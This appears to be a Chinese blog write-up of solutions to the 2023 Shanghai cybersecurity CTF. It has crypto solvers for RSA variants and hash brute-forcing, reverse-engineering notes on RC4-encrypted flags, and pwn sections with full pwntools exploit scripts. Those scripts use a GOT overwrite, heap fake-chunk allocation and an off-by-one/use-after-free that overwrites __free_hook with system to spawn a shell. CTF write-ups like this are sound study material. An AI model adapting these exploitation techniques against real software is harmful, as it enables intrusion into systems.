2023 第八届上海网络安全大赛部分 wp
crypto
bird
签到题,https://www.dcode.fr/birds-on-a-wire-cipher解一下即可
crackme
送分题。。。
dir_flag
from typing import List
import hashlib
import uuid
import sys
flag = f"flag{{{uuid.uuid4()}}}"
flag_split = flag.split("-")
class Node:
def __init__(self, left, right, value: str) -> None:
self.left: Node = left
self.right: Node = right
self.value = value
@staticmethod
def hash(val: str) -> str:
return hashlib.sha256(val.encode('utf-8')).hexdigest()
@staticmethod
def doubleHash(val: str) -> str:
return Node.hash(Node.hash(val))
class MerkleTree:
def __init__(self, values: List[str]) -> None:
self.__buildTree(values)
def __buildTree(self, values: List[str]) -> None:
leaves: List[Node] = [Node(None, None, Node.doubleHash(e)) for e in values]
if len(leaves) % 2 == 1:
leaves.append(leaves[-1:][0]) # duplicate last elem if odd number of elements
self.root: Node = self.__buildTreeRec(leaves)
def __buildTreeRec(self, nodes: List[Node]) -> Node:
half: int = len(nodes) // 2
if len(nodes) == 2:
return Node(nodes[0], nodes[1], Node.doubleHash(nodes[0].value + nodes[1].value))
if len(nodes) == 1:
return Node(nodes[0], nodes[0], Node.doubleHash(nodes[0].value + nodes[0].value))
left: Node = self.__buildTreeRec(nodes[:half])
right: Node = self.__buildTreeRec(nodes[half:])
value: str = Node.doubleHash(left.value + right.value)
return Node(left, right, value)
def printTree(self) -> None:
if not self.root:
return
queue: list = ["r", self.root]
while len(queue) > 0:
node = queue.pop(0)
if isinstance(node, Node):
print(node.value, end=" ")
if node.left:
queue.append(node.left)
if node.right:
queue.append(node.right)
else:
if len(queue) > 0:
queue.append("r")
print()
def getRootHash(self) -> str:
return self.root.value
if __name__ == "__main__":
mtree: MerkleTree = MerkleTree(flag_split)
with open('output.txt', "w") as f:
sys.stdout = f
print(flag)
mtree.printTree()
哈希树的生成,最终的叶子结点内容为flag分隔后的双重哈希值,flag有提示,并且按照uuid的形式进行分割,直接爆破即可
import hashlib
flag1 = '41a5f7781dc69308b187e24924e0a0a337cdcc36f06b736dd99810eda7bb867b'
flag2 = 'a64cd974e0dbd6f6a289ebd2080ffb6e8ac47f794e02cde4db2239c42f63b6ba'
flag3 = 'e813a50278e41a5ea532c95f99ab616d4ec1ffabad99e1c8fde23886bb600005'
flag4 = '8d4bd8d58ddd11cea747d874e676582bb219b065b2989d96b566f0689a3aaff5'
flag5 = 'e477515e963dc46294e815f9b1887541d225f4b027a7129608302ba8d07faef2'
table = '0123456789abcdef'
#flag{09***********************************755ca2}
def hash(val: str) -> str:
return hashlib.sha256(val.encode('utf-8')).hexdigest()
def doubleHash(val: str) -> str:
return hash(hash(val))
def crack1(test):
for _1 in table:
for _2 in table:
for _3 in table:
for _4 in table:
for _5 in table:
for _6 in table:
if doubleHash(test+_1+_2+_3+_4+_5+_6) == flag1:
print(test+_1+_2+_3+_4+_5+_6)
return test+_1+_2+_3+_4+_5+_6
def crack2(flag):
for _1 in table:
for _2 in table:
for _3 in table:
for _4 in table:
if doubleHash(_1+_2+_3+_4) == flag:
print(_1+_2+_3+_4)
return _1+_2+_3+_4
def crack3(test):
for _1 in table:
for _2 in table:
for _3 in table:
for _4 in table:
for _5 in table:
for _6 in table:
if doubleHash(_1+_2+_3+_4+_5+_6+test) == flag5:
print(_1+_2+_3+_4+_5+_6+test)
return _1+_2+_3+_4+_5+_6+test
print(crack1('flag{09')+crack2(flag2)+crack2(flag3)+crack2(flag4)+crack3('755ca2}'))
Twice
from Crypto.Util.number import *
from Crypto.Util.Padding import pad
from secret import flag, a0,a1,b0,b1
def gen_keys(k):
p, q, r = getPrime(k), getPrime(k), getPrime(k)
pubkey = p**2 * q * r
n = pubkey
phi = (p-1) * (q-1) * (r-1)
privkey = inverse(n, phi)
return pubkey, privkey
def encrypt(msg, pubkey):
return pow(bytes_to_long(pad(msg,190)), pubkey, pubkey)
p = getPrime(512)
q = getPrime(512)
e = getPrime(128)
n1 = p*q
assert pow(a0,2) + e * pow(b0,2) == n1
assert pow(a1,2) + e * pow(b1,2) == n1
# one
m = bytes_to_long(flag)
c1 = pow(m, e, n1)
# two
pub,pri = gen_keys(512)
c2 = encrypt(long_to_bytes(c1),pub)
print("n1=",n1)
print("a0=",a0)
print("a1=",a1)
print("b0=",b0)
print("b1=",b1)
print("c2=",c2)
print("pub=",pub)
print("pri=",pri)
主要就是进行了两次加密,主要到存在两个关系,尝试进行分析
assert pow(a0,2) + e * pow(b0,2) == n1
assert pow(a1,2) + e * pow(b1,2) == n1
因为
a0^2 + e*b0^2 == a1^2 + e*b1^2
a0^2 + e*b0^2 == n
a1^2 + e*b1^2 == n
故有
a0^2*b0^2 + e*b0^2*b0^2 == n*b0^2
a1^2*b1^2 + e*b1^2*b1^2 == n*b1^2
两式相见,n*b0^2-n*b1^2 = a0^2*b0^2 + e*b0^2*b0^2 - (a1^2*b1^2 + e*b1^2*b1^2)
又因为
a0^2*b0^2 + e*b0^2*b0^2 == a1^2*b0^2 + e*b1^2*b0^2
a0^2*b1^2 + e*b0^2*b1^2 == a1^2*b1^2 + e*b1^2*b1^2
n*b0^2-n*b1^2 = a1^2*b0^2 + e*b1^2*b0^2-(a0^2*b1^2 + e*b0^2*b1^2)
即
n*(b0^2-b1^2) = a1^2*b0^2-a0^2*b1^2
n*(b0^2-b1^2) = (a1*b0)^2-(a0*b1)^2
n*(b0^2-b1^2) = (a1*b0+a0*b1)-(a1*b0-a0*b1)
故关系式和n存在关系
注意到得到公钥的函数存在特殊的地方,也进行分析
n = p**2 * q * r
phi = (p-1) * (q-1) * (r-1)
a^(phi) = 1 mod (pqr)
又因为
n*d = k*phi+1
故
a^(k*phi+1) = a mod (pqr)
a^(n*d) = a mod (pqr)
a^(n*d)-a = k1*pqr
故pqr可求,并可解密文
通过上述分析,可知在目前情况下,满足求flag的情况
from Crypto.Util.number import *
from Crypto.Util.Padding import unpad
from gmpy2 import *
n1= 87665217778729524993118310155129480311708534438704150676980835344891979982717119161254489670350577173938239682286759779547789055360697960379769693294306641200724257991678505629369338313581657539655057636732714452287023658150014746541718058750871927050204352584824130972892779877896415568548748364583880371427
a0= 9362970563807702423162361787386216886594085863490420184497563324865248429693287404341206766515622648778272030443641712923250846610046357375553046092690266
a1= 9362970563807702423162361745963275441706212437133735476965289880825874017106479792816846422940594285630367772490647779230476318907092613021181772527068514
b0= 74836747076024432741470938222753940689278814091833170112470104078475118700897724833941621360216319460657128947837095907483
b1= 93520964011413593176393772179429258741894666938448164504029535235899813670669478849381259720656022408302270582527720184427
c2= 7090659117351297531755883438960933877263181849815568437232708639999747137583085680350909771730266998763362206865224473283130982570816918537377058225538656521223617210560656370841094169187300346437355127376920626133248983100115455529533265136725274741407727211587363755394889303944789720637515498330115070515942678821608630620272575086220037432383957991049220528177053370450234486390431027269543481157974773863005279984438957464388749795275109730696430700744950555993640720758137888948464005039907816169108829675809911658280616090368129767282407708640291466242813209343944276906740181222776418701978734705056220412984
pub= 15393634704241437811571407047965218207529278849238950329420499882359515149154462592674433680412129087082275102567406550543503710118161775213536183656910892279726520148202227312448507629264239427121015706092403872586978266402316447553116208411724407465368711586887621447872002364407809592953543797319646692321612541334341183378900324146713189121105760280994702695266049904020810024990537652609099294535255399210219454610583930829883737909993183476961897889084229322415995483397484414924734020539093114397393070394929656598174957126771887906087335882580049097369036955153036983424389092042285637185882327630117320615769
pri= 424184707992085368727036634979681060339188016631126395371395132791009626692092220877797321952063158959159298372653275672949543326347146732580465753892335912633332743258010037527036987474957662424735475674152462914082526658466925646224968182493094690460023505421720259663381122409147914948696061450626153526908753546708693503710352787787701648821693599138777500334149879355898444355846028142814267511986218166066642222930494985736426837825122392760739011897554697
a = 2
pqr = gcd(pow(a,pri*pub,pub)-a,pub)
c = pow(c2,pri,pqr)
c = unpad(long_to_bytes(c),190)
c1 = bytes_to_long(c)
e=(n1-a0**2)//b0**2
#n*(b0^2-b1^2) = (a1*b0+a0*b1)-(a1*b0-a0*b1)
p = gcd(a1*b0+a0*b1,n1)
q = n1//p
phi = (p-1)*(q-1)
d = invert(e,phi)
print(long_to_bytes(pow(c1,d,n1)))
RSA_like
import random
from Crypto.Util.number import *
def RRSSAA_prime(bit_length):
while True:
a = random.getrandbits(bit_length//2)
b = random.getrandbits(bit_length//2)
if b % 3 == 0:
continue
p = a ** 2 + 3 * b ** 2
if p.bit_length() == bit_length and p % 3 == 1 and isPrime(p):
return p
def RRSSAA_add(P, Q, mod):
m, n = P
p, q = Q
if p is None:
return P
if m is None:
return Q
if n is None and q is None:
x = m * p % mod
y = (m + p) % mod
return (x, y)
if n is None and q is not None:
m, n, p, q = p, q, m, n
if q is None:
if (n + p) % mod != 0:
x = (m * p + 2) * inverse(n + p, mod) % mod
y = (m + n * p) * inverse(n + p, mod) % mod
return (x, y)
elif (m - n ** 2) % mod != 0:
x = (m * p + 2) * inverse(m - n ** 2, mod) % mod
return (x, None)
else:
return (None, None)
else:
if (m + p + n * q) % mod != 0:
x = (m * p + (n + q) * 2) * inverse(m + p + n * q, mod) % mod
y = (n * p + m * q + 2) * inverse(m + p + n * q, mod) % mod
return (x, y)
elif (n * p + m * q + 2) % mod != 0:
x = (m * p + (n + q) * 2) * inverse(n * p + m * q + r, mod) % mod
return (x, None)
else:
return (None, None)
def RRSSAA_power(P, a, mod):
res = (None, None)
t = P
while a > 0:
if a & 1:
res = RRSSAA_add(res, t, mod)
t = RRSSAA_add(t, t, mod)
a >>= 1
return res
from RRSSAA import *
from Crypto.Util.number import *
from Crypto.Util.Padding import pad
flag = b'xxx'
l = len(flag)//2
part1 = pad(flag[:l],125)
part2 = pad(flag[l:],125)
p, q = RRSSAA_prime(512), RRSSAA_prime(512)
n = p * q
# I do not give its formula to you, try to find it with some papers.
phi =
d = getPrime(360)
e = inverse(d, phi)
m = (bytes_to_long(part1), bytes_to_long(part2))
c = RRSSAA_power(m, e, n)
print(f"c = {c}")
print(f"n = {n}")
print(f"e = {e}")
基于rsa实现的一套加密系统,之前遇到过类似的,基于Boneh and Durfee attack的二元coppersmith攻击即可分解p,q
import itertools
c = (59282499553838316432691001891921033515315025114685250219906437644264440827997741343171803974602058233277848973328180318352570312740262258438252414801098965814698201675567932045635088203459793209871900350581051996552631325720003705220037322374626101824017580528639787490427645328264141848729305880071595656587, 73124265428189389088435735629069413880514503984706872237658630813049233933431869108871528700933941480506237197225068288941508865436937318043959783326445793394371160903683570431106498362876050111696265332556913459023064169488535543256569591357696914320606694493972510221459754090751751402459947788989410441472)
n = 114781991564695173994066362186630636631937111385436035031097837827163753810654819119927257768699803252811579701459939909509965376208806596284108155137341543805767090485822262566517029632602553357332822459669677106313003586646066752317008081277334467604607046796105900932500985260487527851613175058091414460877
e = 4252707129612455400077547671486229156329543843675524140708995426985599183439567733039581012763585270550049944715779511394499964854645012746614177337614886054763964565839336443832983455846528585523462518802555536802594166454429110047032691454297949450587850809687599476122187433573715976066881478401916063473308325095039574489857662732559654949752850057692347414951137978997427228231149724523520273757943185561362572823653225670527032278760106476992815628459809572258318865100521992131874267994581991743530813080493191784465659734969133910502224179264436982151420592321568780882596437396523808702246702229845144256038
def small_roots(f, bounds, m=1, d=None):
if not d:
d = f.degree()
R = f.base_ring()
N = R.cardinality()
f /= f.coefficients().pop(0)
f = f.change_ring(ZZ)
G = Sequence([], f.parent())
for i in range(m+1):
base = N ^ (m-i) * f ^ i
for shifts in itertools.product(range(d), repeat=f.nvariables()):
g = base * prod(map(power, f.variables(), shifts))
G.append(g)
B, monomials = G.coefficient_matrix()
monomials = vector(monomials)
factors = [monomial(*bounds) for monomial in monomials]
for i, factor in enumerate(factors):
B.rescale_col(i, factor)
B = B.dense_matrix().LLL()
B = B.change_ring(QQ)
for i, factor in enumerate(factors):
B.rescale_col(i, 1/factor)
H = Sequence([], f.parent().change_ring(QQ))
for h in filter(None, B*monomials):
H.append(h)
I = H.ideal()
if I.dimension() == -1:
H.pop()
elif I.dimension() == 0:
roots = []
for root in I.variety(ring=ZZ):
root = tuple(R(root[var]) for var in f.variables())
roots.append(root)
return roots
return []
PR.<x,y>=PolynomialRing(Zmod(e))
f=x*(y^2 + (n+1)*y + (n^2-n+1)) + 1
bounds=(2^360,2^512)
z = small_roots(f,bounds,m=4,d=4)[0][1]
print(z)
#21581081267317264057300397805667850767978100748500497887465036772601909848077661066029306567420215347344093486009661621345217539597125914633479358949462578
然后正常求解一下即可
from RRSSAA import *
from Crypto.Util.number import *
from Crypto.Util.Padding import unpad
from gmpy2 import *
z = 21581081267317264057300397805667850767978100748500497887465036772601909848077661066029306567420215347344093486009661621345217539597125914633479358949462578
c = (59282499553838316432691001891921033515315025114685250219906437644264440827997741343171803974602058233277848973328180318352570312740262258438252414801098965814698201675567932045635088203459793209871900350581051996552631325720003705220037322374626101824017580528639787490427645328264141848729305880071595656587, 73124265428189389088435735629069413880514503984706872237658630813049233933431869108871528700933941480506237197225068288941508865436937318043959783326445793394371160903683570431106498362876050111696265332556913459023064169488535543256569591357696914320606694493972510221459754090751751402459947788989410441472)
n = 114781991564695173994066362186630636631937111385436035031097837827163753810654819119927257768699803252811579701459939909509965376208806596284108155137341543805767090485822262566517029632602553357332822459669677106313003586646066752317008081277334467604607046796105900932500985260487527851613175058091414460877
e = 4252707129612455400077547671486229156329543843675524140708995426985599183439567733039581012763585270550049944715779511394499964854645012746614177337614886054763964565839336443832983455846528585523462518802555536802594166454429110047032691454297949450587850809687599476122187433573715976066881478401916063473308325095039574489857662732559654949752850057692347414951137978997427228231149724523520273757943185561362572823653225670527032278760106476992815628459809572258318865100521992131874267994581991743530813080493191784465659734969133910502224179264436982151420592321568780882596437396523808702246702229845144256038
p_q = iroot(z**2 - 4*n,2)[0]
p = (z+p_q)//2
q = z - p
phi = (p**2 + p + 1) * (q **2 + q + 1)
d = inverse(e,phi)
m = RRSSAA_power(c, d, n)
print(unpad(long_to_bytes(m[0]),125)+unpad(long_to_bytes(m[1]),125))
revenge
未解出,待研究
reverse
ezez
签到题,去掉花指令,然后smc解密一下得到flag被加密,加密算法为rc4,在线解密一下即可
https://www.toolhelper.cn/SymmetricEncryption/RC4
密文:RQpxxZgUqxzwonBuDApb3PyRJ8CcLIyXVozsVjurmPQdUdND+cly4HFq
密钥VrDQ-ffgaEig04qx
flag在哪?
程序主要的加密验证的代码是放在申请的堆里的,动态跟踪一下,伪代码如下
char *__cdecl sub_4813E0(int a1, int a2)
{
v15 = off_4062B4;
v7 = dword_406448;
v6 = dword_40644C;
v14 = off_4062B4(a1);
v13 = v15(a2);
for ( i = 0; i < v14; ++i )
{
v5[i] = *(_BYTE *)(i + a1) ^ 4;
if ( i % 3 == 1 )
v5[i] ^= byte_406000[3 * i];
}
v5[v14] = 0;
for ( j = 0; j < v13; ++j )
{
v4[j] = *(_BYTE *)(j + a2) ^ 6;
if ( j % 2 == 1 )
v4[j] = *(_BYTE *)(j + a2 + 7);
}
v4[v13] = 0;
v12 = v3;
off_406458(v3, sub_401AC0, 4132);
v9 = v3;
v10 = v5;
v11 = v4;
v8 = v3;
return v3;
}
然后调用这个函数
int __cdecl sub_19EC64(char *Str, char *a2)
{
v10 = off_4062B4(Str);//长度必须为15
v6 = off_4062B4(a2);//e4bdtRV02的长度
off_4062B4(byte_406274);
v12 = 15;
v11 = 15 - v10;
if ( v10 != 15 )//长度必须为15
return v11;
for ( i = 0; i < v10; ++i )
{
v4 = 0;
v9 = i % 3;
v7 = off_406450(i % 3);//1,9 2,8
v5 = (v7 + 2) ^ Str[i];
v8 = a2[i];
if ( i >= v6 )
v8 = 0;
v3[i] = v8 + v5;
if ( v3[i] != byte_406274[i] )
return i + 1;
}
return 0;
}
//D3 38 D1 D3 7B AD B3 66 71 3A 59 5F 5F 2D 73 00 FF FF FF FF
然后逆算法解密即可
encryptor
rust写的程序,刚开始看比较懵,但结合字符串,可以大致推出flag被rc4加密,密钥和时间相关,可以进行调试,密钥为时间分钟乘秒,爆破即可
from hashlib import sha256
def rc4_main(key, message):
s_box = rc4_init_sbox(key)
crypt = str(rc4_excrypt(message, s_box))
return crypt
def rc4_init_sbox(key):
s_box = list(range(256))
j = 0
for i in range(256):
j = (j + s_box[i] + (key[i % len(key)])) % 256
s_box[i], s_box[j] = s_box[j], s_box[i]
return s_box
def rc4_excrypt(plain, box):
res = []
i = j = 0
for s in plain:
i = (i + 1) % 256
j = (j + box[i]) % 256
box[i], box[j] = box[j], box[i]
t = (box[i] + box[j]) % 256
k = box[t]
res.append(chr((s) ^ k))
cipher = "".join(res)
return cipher
data = open('flag.txt.enc', 'rb').read()
for i in range(3600):
key = sha256(str(i).encode()).digest()
flag = rc4_main(key,data)
if 'flag' in flag:
print(i)
print(flag)
break
HackedSystem
0解
Trans
0解
pwn
ChangeAddr
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
题目提示较多,存在任意地址4字节的写入,flag相关的函数注册了信号量,在段错误的时候触发,因此劫持一下put和got,然后触发段错误即可
from pwn_file import *
from pwn_env import *
from pwn_api import *
from sys import argv
from pwn import *
pwn_name = './'+argv[0][:-3]
elf = ELF(pwn_name)
ld_so,libc_so_L,libc_so_R = diffGlibc()
setpwn = SetPwn(ld_so,libc_so_L,libc_so_R,pwn_name)
r,libc = setpwn.pattern()
pwnapi = PwnApi(r,elf)
def pwnme():
puts_got = elf.got['puts']
print(hex(puts_got))
back_door = 0x0804932C
r.recvuntil(b'write?\n')
r.sendline(hex(puts_got).encode('utf-8'))
sleep(0.3)
r.sendline(hex(back_door).encode('utf-8'))
r.recvuntil(b'fault!\n')
r.sendline(b'a'*0x35)
r.interactive()
pwnme()
KeyBox
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
对edit中,对输入的大小没有限制,存在任意长度溢出漏洞,伪造堆(分配的时候控制堆管理器),然后在malloc写入后门函数即可,注意进入菜单之前有个输入密钥的环节,需要绕一下
from pwn_file import *
from pwn_env import *
from pwn_api import *
from sys import argv
from pwn import *
pwn_name = './'+argv[0][:-3]
elf = ELF(pwn_name)
ld_so,libc_so_L,libc_so_R = diffGlibc()
setpwn = SetPwn(ld_so,libc_so_L,libc_so_R,pwn_name)
r,libc = setpwn.pattern()
pwnapi = PwnApi(r,elf)
def bypasskey():
r.recvuntil(b'Input the first key: \n')
r.sendline(str(-9223372036854775796).encode('utf-8'))
r.recvuntil(b'Input the second key: \n')
r.sendline(str(1).encode('utf-8'))
def menu(choice):
r.recvuntil(b'Your choice:')
r.sendline(str(choice).encode('utf-8'))
def show(idx):
menu(1)
def add(size,content):
menu(2)
r.recvuntil(b'Please enter the length of the item:')
r.sendline(str(size).encode('utf-8'))
r.recvuntil(b'Please enter the name of item:')
r.send(content)
def edit(idx,size,content):
menu(3)
r.recvuntil(b'Please enter the index of item:')
r.sendline(str(idx).encode('utf-8'))
r.recvuntil(b'Please enter the length of item:')
r.sendline(str(size).encode('utf-8'))
r.recvuntil(b'Please enter the new name of the item:')
r.sendline(content)
def delete(idx):
menu(4)
r.recvuntil(b'Please enter the index of item:')
r.sendline(str(idx).encode('utf-8'))
def pwnme():
heap_addr = 0x4040c0
back_door = 0x401765
bypasskey()
add(0x7f,'a')
add(0x68,'b')
add(0x68,'b')
add(0x68,'d')
delete(2)
delete(1)
payload = b'a'*0x80+p64(0)+p64(0x71)+p64(heap_addr-0x8)
edit(0,0xa0,payload)
add(0x68,'e')
print('[+]malloc_gots:{}'.format(hex(elf.got['malloc'])))
add(0x68,p64(elf.got['malloc']))
edit(0,0x20,p64(back_door))
menu(2)
r.recvuntil(b'Please enter the length of the item:')
r.sendline(str(0x68).encode('utf-8'))
#gdb.attach(r)
r.interactive()
pwnme()
ssql
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
一个很有意思的题,模拟了mysql,采用双向指针的数据结构,漏洞在编辑的时候存在off-by-one,然后在delete存在uaf,泄露libc然后伪造col,并让next指向它获取任意地址写,覆盖free_hook即可
from pwn_file import *
from pwn_env import *
from pwn_api import *
from sys import argv
from pwn import *
pwn_name = './'+argv[0][:-3]
elf = ELF(pwn_name)
ld_so,libc_so_L,libc_so_R = diffGlibc()
setpwn = SetPwn(ld_so,libc_so_L,libc_so_R,pwn_name)
r,libc = setpwn.pattern()
pwnapi = PwnApi(r,elf)
def menu(choice):
r.recvuntil('mysql > ')
r.send(choice)
def add_tab(tab_name):
menu('CREATE TABLE '+tab_name)
def add_col(tab_name,col_name):
menu('CREATE '+col_name+' FROM '+tab_name)
def edit(tab_name,col_name,name,content):
menu('EDIT '+col_name+' FROM '+tab_name)
r.recvuntil('Column name:')
r.send(name)
r.recvuntil('Column Content: ')
r.send(content)
def delete_tab(tab_name):
menu('DELETE TABLE '+tab_name)
def delete_col(tab_name,col_name):
menu('DELETE '+col_name+' FROM '+tab_name)
def show_tab(tab_name):
menu('SHOW TABLE '+tab_name)
def pwnme():
add_tab('0')
add_tab('1')
add_tab('2')
add_tab('3')
for i in range(10):
add_col('0','a'+str(i))
delete_tab('0')
add_tab('0')
for i in range(7):
add_col('0','a'+str(6-i))
add_col('1','b0')
show_tab('1')
libc_base = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b"\x00"))-0x1ece50
print('[+]libc_base:',hex(libc_base))
free_hook = libc_base+libc.sym['__free_hook']
system = libc_base+libc.sym['system']
add_col('2','c0')
add_col('2','c1')
payload = b'a'*0x70+b'#'.ljust(0x10,b'\x00')+p64(free_hook)*3
edit('2','c0','?'*0x10,payload)
edit('2','#','#',b'/bin/sh\x00'+p64(system))
delete_col('2','#')
print('[+]free_hook:',hex(free_hook))
print('[+]system:',hex(system))
#gdb.attach(r)
r.interactive()
pwnme()
hp
待研究
mysh
0解题
作者:寒江寻影
本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须在文章页面给出原文链接,否则保留追究法律责任的权利。
浙公网安备 33010602011771号